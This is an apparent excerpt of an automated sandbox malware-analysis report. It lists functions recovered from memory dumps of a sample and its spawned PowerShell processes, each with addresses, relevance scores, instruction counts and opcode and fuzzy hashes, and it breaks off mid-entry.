Opcode Fuzzy Hash: 19d407e82f951937074b1f8ebd6c3eb2a0e19cc915ef3f213671de2e1efb81c9
Instruction Fuzzy Hash: C6F09630E0A69E4FEB94EF68C8252FD76E4FF08304F00057AE81DC2195DF7852548B81

Function 00007FFD9B8B2749 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710818366.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449f0ecfa30cb93d85a91a10af14c671c055e5dd50f03d9afe9ec377252f4731
Instruction ID: bcbfcaafdc4561e942b00c38ad9c174b00f9fc45f6038092b1fc8b5d460b3731
Opcode Fuzzy Hash: 449f0ecfa30cb93d85a91a10af14c671c055e5dd50f03d9afe9ec377252f4731
Instruction Fuzzy Hash: 10F0963091A38E8FDB669FB498642E93B60FF0A305F4544BAD409C60E6DB386554CB51

Function 00007FFD9B8B27BD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710818366.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9caab22e35eb82a2182f65127a8349281ea06b13dcf6dcb6dc34f16c4050abb6
Instruction ID: 8bd0fe50c6c7128c8fa127d84146e199f772735227e918be017e7eaeed9ee2e0
Opcode Fuzzy Hash: 9caab22e35eb82a2182f65127a8349281ea06b13dcf6dcb6dc34f16c4050abb6
Instruction Fuzzy Hash: 40F0F030A1E69E8FEB699FB488251B93FA0FF09304F0504BED409C20E6DB38A5548B81

Function 00007FFD9B8B2344 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710818366.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb39d8d73b7a4ee641e99d8b1135dcb105f8b5051ff7251977619a170b99f9a
Instruction ID: 21570b759f7843f95f32bed2aa0bb1bb6d68f4178c8a9168f6ad7ff68f13bcc9
Opcode Fuzzy Hash: efb39d8d73b7a4ee641e99d8b1135dcb105f8b5051ff7251977619a170b99f9a
Instruction Fuzzy Hash: A7F0A730A0E21E9FDB64EF50C8607A877B1EB55300F1545FAC04DC76A1CE786A88CF80

Non-executed Functions

Function 00007FFD9B8B92A3 Relevance: 1.7, Strings: 1, Instructions: 411COMMON

Download Yara Rule

Strings

-, xrefs: 00007FFD9B8B93DC

Memory Dump Source

Source File: 00000000.00000002.1710818366.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 4255d98661dedc4c460b1a8fa1d0df703a634bf2f6d8973cb891fdd28c30fe1d
Instruction ID: 726fdae808f4e4a52f3697acbac941cbb3b8b678444724a05f1ee3c7d8f5df14
Opcode Fuzzy Hash: 4255d98661dedc4c460b1a8fa1d0df703a634bf2f6d8973cb891fdd28c30fe1d
Instruction Fuzzy Hash: 52F1DFA284E3D14FD7038BB45CB55913FB0AE27214B0E49EBC4C0CF4E3E6196A5AD762

Function 00007FFD9B8BEB24 Relevance: 8.9, Strings: 7, Instructions: 117COMMON

Download Yara Rule

Strings

}, xrefs: 00007FFD9B8BEFB0
h, xrefs: 00007FFD9B8BFB3C
u, xrefs: 00007FFD9B8BFB01
{, xrefs: 00007FFD9B8BDF15
%, xrefs: 00007FFD9B8BFC19
V, xrefs: 00007FFD9B8BFB0E
C, xrefs: 00007FFD9B8BEF48

Memory Dump Source

Source File: 00000000.00000002.1710818366.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: %$C$V$h$u${$}
API String ID: 0-1921298197
Opcode ID: 697a69dfe20ba82918a245030de2deff618527a3d4f3c3cf18381f3a55a90141
Instruction ID: 4ce6034adbbcda38a0d95c899e0004473c114ce836e3b2331e4f6f88eae1516e
Opcode Fuzzy Hash: 697a69dfe20ba82918a245030de2deff618527a3d4f3c3cf18381f3a55a90141
Instruction Fuzzy Hash: 5E51B670E0927E8FEB74DF64C8A47F9B6B1AB58301F0145FAD04DA6691CB785A84DF80

Function 00007FFD9B8C097E Relevance: 6.4, Strings: 5, Instructions: 176COMMON

Download Yara Rule

Strings

", xrefs: 00007FFD9B8C10C2
[, xrefs: 00007FFD9B8C0EC2
+, xrefs: 00007FFD9B8C0C44
}, xrefs: 00007FFD9B8C09CA
, xrefs: 00007FFD9B8C097E

Memory Dump Source

Source File: 00000000.00000002.1710818366.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: $"$+$[$}
API String ID: 0-4214201918
Opcode ID: 8a7c41c9ffc2531cfb70e13aa839c587f701bad039f78bdf5dbd16f2d3ead53a
Instruction ID: 20c935b065018aabfcbdf6682deb8d4021020ef267acea778ec582ad33d016bb
Opcode Fuzzy Hash: 8a7c41c9ffc2531cfb70e13aa839c587f701bad039f78bdf5dbd16f2d3ead53a
Instruction Fuzzy Hash: 9D81D7B0E1922D8FEB64EFA4D4A57FDB6B1BF48301F1140BAD04DA7291CA385A84DF50

Function 00007FFD9B8C196E Relevance: 5.2, Strings: 4, Instructions: 172COMMON

Download Yara Rule

Strings

N\, xrefs: 00007FFD9B8C19CF
D\, xrefs: 00007FFD9B8C1989
d\, xrefs: 00007FFD9B8C1A69
Z\, xrefs: 00007FFD9B8C1A1E

Memory Dump Source

Source File: 00000000.00000002.1710818366.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: D\$N\$Z\$d\
API String ID: 0-237293203
Opcode ID: 1a812ffbb008ac226cd5e38846f8778b936bd1ecca92cb5ed9ef804cf124729d
Instruction ID: 5efba1defa4580e7367e6364397784f5fbbf2a403e87f19e88037786ab539bc9
Opcode Fuzzy Hash: 1a812ffbb008ac226cd5e38846f8778b936bd1ecca92cb5ed9ef804cf124729d
Instruction Fuzzy Hash: 9B51CA70A0991D8FDBA8EF58C8A5BA9B7B1FF98301F1041A9D01DE7295CE34A981CF40

Function 00007FFD9B8BE167 Relevance: 5.1, Strings: 4, Instructions: 127COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9B8BE268
:, xrefs: 00007FFD9B8BE1F5
R, xrefs: 00007FFD9B8BE171
g, xrefs: 00007FFD9B8BE2CC

Memory Dump Source

Source File: 00000000.00000002.1710818366.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: :$I$R$g
API String ID: 0-989302672
Opcode ID: 802f2a07b025b1a8c28480ddd5e31825105e2c4700967273c433d5e893bd5dac
Instruction ID: 346114b7e9389745bcb3efe859e796ce1aedc8e7cbccaa12f20a38672d43c24b
Opcode Fuzzy Hash: 802f2a07b025b1a8c28480ddd5e31825105e2c4700967273c433d5e893bd5dac
Instruction Fuzzy Hash: 4B51AF70E0566D8FDBA5DF68C894BE9B7B1EB59301F1041EAD44DA2291CB746BC1CF80

Function 00007FFD9B8BDFAE Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

$, xrefs: 00007FFD9B8BDFB8
K, xrefs: 00007FFD9B8BDFF3
", xrefs: 00007FFD9B8BE029
1, xrefs: 00007FFD9B8BED34

Memory Dump Source

Source File: 00000000.00000002.1710818366.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: "$$$1$K
API String ID: 0-1999501151
Opcode ID: 7b278ca2d803aad8f611599d30606cee073c82d59e55afe7304600ee1c18edfb
Instruction ID: 150820aef9216a3ec7494655af0bde182e13a90334ea0365879b5f95f89d949d
Opcode Fuzzy Hash: 7b278ca2d803aad8f611599d30606cee073c82d59e55afe7304600ee1c18edfb
Instruction Fuzzy Hash: 1A310EB0E0A26E8FEBB4DF54C8947E977B1EF58311F0045BAD44DA6691CB385A84CF41

Function 00007FFD9B8C0D4D Relevance: 5.1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

Strings

{, xrefs: 00007FFD9B8C0F7C
$, xrefs: 00007FFD9B8C0FC6
-, xrefs: 00007FFD9B8C0F89
*, xrefs: 00007FFD9B8C0D57

Memory Dump Source

Source File: 00000000.00000002.1710818366.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: $$*$-${
API String ID: 0-2552764092
Opcode ID: a47f82aba10856227749b0eef5a4166fd6b6fd8c65524167d61c76899314cdde
Instruction ID: fedb269414372418312855297322e25e0539639eef5251c5bca7806d935ee647
Opcode Fuzzy Hash: a47f82aba10856227749b0eef5a4166fd6b6fd8c65524167d61c76899314cdde
Instruction Fuzzy Hash: EF31D570E0922E8FEB68EF94D4A47BDB7B1AB58301F1150BAD04DA7291CB385A84CF41

Analysis Process: powershell.exePID: 7588, Parent PID: 7456COMMON

Executed Functions

Function 00007FFD9B88A760 Relevance: .5, Instructions: 527COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2084283395.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833732bf91a7995321afef5d7a5b16c2f61c7f996f7ccbcb7ac8d6749b21a479
Instruction ID: f0b2bc804d0978b001df374d9a26be02ced4b9f42e1a333e54ee34ad02c8485f
Opcode Fuzzy Hash: 833732bf91a7995321afef5d7a5b16c2f61c7f996f7ccbcb7ac8d6749b21a479
Instruction Fuzzy Hash: 3CF1D230A09A4D8FDF98DF5CC495AA977E1FFA8300F15416AD45DD72A6DA34EC82CB80

Function 00007FFD9B956605 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2091901620.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 494a183cb6fd7789ebd898b11c239d4488dc4c97fffce7b87e3f7917d6e2d306
Instruction ID: a0d915ed0f34b5543a34f3543230d2bcf32d84fb708e907098d107417b9c6184
Opcode Fuzzy Hash: 494a183cb6fd7789ebd898b11c239d4488dc4c97fffce7b87e3f7917d6e2d306
Instruction Fuzzy Hash: 7FD13732A2FB8D1FEBA597A848654B57BE0EF16314B0901FED89DC70E3DA58A905C341

Function 00007FFD9B889728 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2084283395.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d98a620f63f47aa01565ee2712d4c5e1e6c4ac097566b3fe066b4e886979d9e5
Instruction ID: a2afa096d74b90a5ac1e9a7dd19cbe882ef29289ca930770372b3713812e3e52
Opcode Fuzzy Hash: d98a620f63f47aa01565ee2712d4c5e1e6c4ac097566b3fe066b4e886979d9e5
Instruction Fuzzy Hash: 62415D71A0DF888FDB19AF5C68196A87FE0FF59710F44816FE05883297DA34A81587C2

Function 00007FFD9B88B03A Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2084283395.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50a2eb85499bc87dff9dcd01e86811cb029d2fa3d98f973e0c387b0d2b28671b
Instruction ID: 26b65a52816dcb18aec034fae107a8081094ce34ff8171a3629f4181c8a7788f
Opcode Fuzzy Hash: 50a2eb85499bc87dff9dcd01e86811cb029d2fa3d98f973e0c387b0d2b28671b
Instruction Fuzzy Hash: FD415B71A0EE8C4FEB25CB9C9C99AF97BE0EF95720F04417BD498C3053DA7169068781

Function 00007FFD9B76EE24 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2078348389.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b76d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca655013db44bc4165bb0e71ea2ac9e7aad69d3bd394223945356a901ba11cf3
Instruction ID: 8076fca8d6eebb64c42b461631789683e53733100c0221fdb2a9e1e5ddb2f385
Opcode Fuzzy Hash: ca655013db44bc4165bb0e71ea2ac9e7aad69d3bd394223945356a901ba11cf3
Instruction Fuzzy Hash: 7C41267050EBC89FE7568B2898559523FF0EF53320B1A06DFD088CB1B3D625A846C7A3

Function 00007FFD9B883428 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2084283395.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d029c9b946c01148c2bf19833c09f71be386166031403feaf0aa4b8d4ffc8ac
Instruction ID: 86f0297a6c21b54887b51e18fa9af5eb2319e9d0a8a3ea8a28a968570eb4b3da
Opcode Fuzzy Hash: 5d029c9b946c01148c2bf19833c09f71be386166031403feaf0aa4b8d4ffc8ac
Instruction Fuzzy Hash: 8111AD26A0E7C64FE72707A868760E07FB0EF0323475A02E7D4D58B4B3D51A6897C795

Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2084283395.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41

Function 00007FFD9B889CF8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2084283395.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 225d534b10ffa96b5f6359070a9d0e006bf857a65ebfb589d90f9e322fa7fec6
Instruction ID: fe4b42ce1718875437b32093cd74c164c03aefd7c0e109ff27d8a41de0f6f770
Opcode Fuzzy Hash: 225d534b10ffa96b5f6359070a9d0e006bf857a65ebfb589d90f9e322fa7fec6
Instruction Fuzzy Hash: 09F0B431808A8D4FDB56EF6888695D5BFA0EF16311B0502DBE458C70B2DB759558CB82

Function 00007FFD9B95414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2091901620.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbf97070b9bfb200fa8893b1230491b82ec2ca9b327ce22a25ce7eddcc7feed5
Instruction ID: e2741f3f2330d2024844de7ec714a7f181fcec0cae7a9e31391320b95f91b1c3
Opcode Fuzzy Hash: bbf97070b9bfb200fa8893b1230491b82ec2ca9b327ce22a25ce7eddcc7feed5
Instruction Fuzzy Hash: 9DF0E932B4D5098FD7A8EB9CE4519E873E0EF65320B1640BAE06DC71B7CA25EC40C741

Function 00007FFD9B954400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2091901620.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0655ffdb4b38ef4701a76ec1a9ee5a08a4ff0db070ff51c06564be055aeb8ba
Instruction ID: fef10f83c32d4ba1af47932e103d900a8a9aad8eca62b1e94c5a51fc5654b872
Opcode Fuzzy Hash: f0655ffdb4b38ef4701a76ec1a9ee5a08a4ff0db070ff51c06564be055aeb8ba
Instruction Fuzzy Hash: 38F0B431A4D5498FD794EA9CE0609A873E0EF0532074600BAE05DCB1A7CA25BC40C740

Function 00007FFD9B9541D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2091901620.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b950000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: ef0e477c3a8d88fbc3791122f3f41a252fcdd9f92c2fd245001ca178e7a9b1aa
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: A8E0123175C4089FDAB8DA8CE0519A973E1EBA832171141BBD14EC7675CA21ED518B80

Non-executed Functions

Function 00007FFD9B888BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

N_^6, xrefs: 00007FFD9B888BFA
N_^<, xrefs: 00007FFD9B888C2A
N_^I, xrefs: 00007FFD9B888C72
N_^F, xrefs: 00007FFD9B888C6A
N_^J, xrefs: 00007FFD9B888C7A

Memory Dump Source

Source File: 00000004.00000002.2084283395.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID: N_^6$N_^<$N_^F$N_^I$N_^J
API String ID: 0-4116931533
Opcode ID: d4e7dc1a747e24059646b11c896e6614ab4121307de0c87598fd87f4a0746f74
Instruction ID: 30ea27bb2e72a318fbb9709187f96eb87b3e53d746551ae2b785aa62a2a43157
Opcode Fuzzy Hash: d4e7dc1a747e24059646b11c896e6614ab4121307de0c87598fd87f4a0746f74
Instruction Fuzzy Hash: C22102B77084269FD30A77EDBC289D87780DB9427A74801B3D368CB543E924608B87C1

Function 00007FFD9B8885FA Relevance: 5.1, Strings: 4, Instructions: 107COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD9B88862A
N_^, xrefs: 00007FFD9B8886C9
N_^, xrefs: 00007FFD9B88866A
N_^, xrefs: 00007FFD9B8885FA

Memory Dump Source

Source File: 00000004.00000002.2084283395.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b880000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: b7b0007764f870cd9563e05303f4f00494b7376d9b8ea731c6b872b5951f6dc0
Instruction ID: df15da0f17990a1394cf58c6b39e88b8502c58f434ff5062ee8f6f6875b4314b
Opcode Fuzzy Hash: b7b0007764f870cd9563e05303f4f00494b7376d9b8ea731c6b872b5951f6dc0
Instruction Fuzzy Hash: B131549290FFD61BE767876A8C7D4912FA0FF2666474E41F7C0E64B0A3E91529078342

Analysis Process: powershell.exePID: 7596, Parent PID: 7456COMMON

Executed Functions

Function 00007FFD9B966605 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2492334930.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af8b3607cae0bfbb1121e9f83a176d37f1cab83670b3011d33d42d20f26ce703
Instruction ID: 8b0d8641e4b7d5992febd3f36fe12189e46fe0b346dfa9833e3f28387d8317d8
Opcode Fuzzy Hash: af8b3607cae0bfbb1121e9f83a176d37f1cab83670b3011d33d42d20f26ce703
Instruction Fuzzy Hash: C4D15832A2FB8E9FEBA5DB7858655B57BA0EF16310B0901FED05CC70E3DA18A905C341

Function 00007FFD9B89665A Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2490480136.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b997d3258f237d4e4311fb6348c10cffb5128b0f68b72d18a207c70762cf00
Instruction ID: a1a95d1f4d0647a795ef6af262e8e11a73a01b6eb17120e76d32c5c74d41214b
Opcode Fuzzy Hash: b8b997d3258f237d4e4311fb6348c10cffb5128b0f68b72d18a207c70762cf00
Instruction Fuzzy Hash: A9D1D071A09A4D8FDF98DF9CC4A5AED7BA1FF68340F0542A6D409D7296CA34E842C780

Function 00007FFD9B89604D Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2490480136.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11f403ccfbf917192e01b7da2da6dc35bd091d99f432eec61fc6d4626ce65a35
Instruction ID: 3ac518922fb6a7500ca514f406fde1436b7c5109de3f22f657052a9be8d26fae
Opcode Fuzzy Hash: 11f403ccfbf917192e01b7da2da6dc35bd091d99f432eec61fc6d4626ce65a35
Instruction Fuzzy Hash: 2711706190E7CA8FDB179B7898745E53FB0EF17244B0A01E7D489CB0B3DA186949C752

Function 00007FFD9B89A9D0 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2490480136.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fac4e5eee859e9d994640743530095f5a72071f3624bf69f581f5211e60b246b
Instruction ID: ecc9639528188e9bb4263223a03ad4a5b9d8e7183eb8f3f514b44436b3401586
Opcode Fuzzy Hash: fac4e5eee859e9d994640743530095f5a72071f3624bf69f581f5211e60b246b
Instruction Fuzzy Hash: 14715A31A0FB8D5FEB19CB2888A94647FE0EF5665471502FFD089C70A3ED25A8078341

Function 00007FFD9B899748 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2490480136.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d467352e88dc29965864e4554a8d4d31a6d7c409c557f6b7c9f7a24249bb948d
Instruction ID: 95ffff556940f19c5cd9e80c066c40e1553730aa2417336e9ce1763bf802ed7f
Opcode Fuzzy Hash: d467352e88dc29965864e4554a8d4d31a6d7c409c557f6b7c9f7a24249bb948d
Instruction Fuzzy Hash: ED412871A0DB8C8FDB189F5C980A6A8BFE0FB69310F54416FE449C3296DB20A955C7C2

Function 00007FFD9B77EE24 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2488402669.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b77d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d121faf40aedc15900e1d20f913fb299e3aafe5fd3ae55e0ceb9effa9123dfe
Instruction ID: 12eedf65bdcefbb476938e27ddf2f768ba657f7e6beee93f725c5afeb1d7abd8
Opcode Fuzzy Hash: 9d121faf40aedc15900e1d20f913fb299e3aafe5fd3ae55e0ceb9effa9123dfe
Instruction Fuzzy Hash: 1441047140EBC85FE7569B2898919523FF0EF52320B1A06EFD088CB5B3D665A846C792

Function 00007FFD9B89A64C Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2490480136.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c639de28e9ddaab4022d00c2b7e79cf391b6fb6fc6ea3cd1f1a35243d3508a
Instruction ID: 1fc59d137c7162e66c24fefc1138fe2fe91901e5beb853c5e3a7089b1ec489ad
Opcode Fuzzy Hash: 25c639de28e9ddaab4022d00c2b7e79cf391b6fb6fc6ea3cd1f1a35243d3508a
Instruction Fuzzy Hash: AA21F83190C74C4FDB59DF9C984A7E97FE0EB96321F04416BD048C3156DA74945ACB91

Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2490480136.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

Function 00007FFD9B96414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2492334930.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9792ab76357ec944fe649c0fb6e6e96e41a3d612fa8574661618a5c77967acf
Instruction ID: 33f8d9a34e666587ea9b7d0e7acbdf6539914883a424bd4d8c7f2528f61693ad
Opcode Fuzzy Hash: a9792ab76357ec944fe649c0fb6e6e96e41a3d612fa8574661618a5c77967acf
Instruction Fuzzy Hash: 74F0E232B0E5098FD768EB9CE4519E873E0EF6532071640BAE06DC72B3CA26EC40C781

Function 00007FFD9B964400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2492334930.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

